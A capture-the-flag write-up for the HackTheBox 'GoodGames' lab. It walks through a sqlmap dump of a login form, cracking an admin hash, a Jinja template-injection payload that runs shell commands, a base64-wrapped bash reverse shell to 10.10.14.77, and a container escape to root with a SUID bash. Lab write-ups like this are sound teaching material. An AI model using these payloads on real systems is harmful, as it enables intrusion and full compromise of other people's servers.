# HackTheBox - GoodGames
## NMAP
```bash
PORT STATE SERVICE VERSION
80/tcp open ssl/http Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
```
## PORT 80 (HTTP)
Visting port 80 it shows us about a gaming page where it lists the current games
But it's just a static page where these links won't lead to anywhere , there's a page to a store which says that it will be available soon
There's a login page but it asks for an email address so I left this form , and went with signing up a user
After creating a user we can login on the site
With the password reset , I tried to see if it was taking a user name in the parameters
It wasn't taking any username so taking a step back on the login page
We can't perform sqli like this as it's matching the format of an email address so , I intercepted the request with burp and save the request , after that ran `sqlmap`
This shows that it's vulnerable to sqli , so let's just dump the database.
Being a time based sqli , it was taking some time to dump the data , so we only want the users table so let's just dump that
```bash
sqlmap -r sql --batch -D main -T user --dump
```
We can then just skip the rest of the data as we only needed the admin hash, using crackstation to crack hash we can get the password `superadministrator`
So logging with the admin credentials
On becoming admin , we can see another options which would take us to `internal-administration.goodgames.htb`
This brings us another login page for `Flask Volt`
I looked if there were any default credentials for this but it seems that it's just a template on github for flask applications login page and being a flask application it might be vulnerable to one of the common attacks which is Server Side Template Injection `SSTI` maybe as this is the first thing that I would look at
So now let's look for an input field where we can test for SSTI payloads
Setting page has an input field for username , so testing with payload `{{7*7}}` it should return the result 49
It did now we need to find which template engine it's using , to do that we can check with payload `{{7*'7'}}` , if it still returns the result 49 that means it's using `twig` or if it returns 7777777 then it's using `jinja`
So it's jinja , now we need to look for payload to get command execution
```bash
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
```
Using this payload we can execute shell commands
This returns as a root user , normally you would get a low privleged user like `www-data` or some other user could be that this application is hosted in a docker container , using bash reverse shell we can get a shell by first convert the reverse shell payload to base64
```bash
echo "bash -i >& /dev/tcp/10.10.14.77/2222 0>&1" | base64
```
```bash
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43Ny8yMjIyIDA+JjEK" |base64 -d| bash').read() }}
```
Running `ifconfig`
This IP address tells that we are indeed inside in a container , running `df -h` to see disk space we can see a directory `/home/augustus` from `/dev/sda1` as this user doesn't exist on this docker container this probably mounted from the host machine
So here I thought of adding an ssh for `augustus` by creating a `.ssh` folder and adding the public key in `authorized_keys` file
And then changing the owner of that folder to `augustus`
But the host machine didn't had ssh service running when we ran nmap , could be that it's open locally or we can access it from the container
We can't , we know that this container's IP address is `172.19.0.2` and whenever we run a docker container on a host machine that machine becomes a gateway and the IP is assigned to `172.19.0.1`
Let's verify this by transferring a static binary of nmap
This shows that port 80 and 22 is open , so let's give it a shot
And we are on the host machine now
Running `sudo -l` to see what permissions we have but there's no sudo binary
So going back again , we saw that we can change permissions in augustus's folder ,so let's just create a file and see if it gets reflected with the room permissions
Logging back again , we see that the file has root permissions , so we can just copy bash , make it a SUID and run it on the host machine
But it didn't ran and started screaming about a library file so I transferred my host machine's bash file on the docker container , made that a SUID again and then tried running the binary and it worked
## References
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection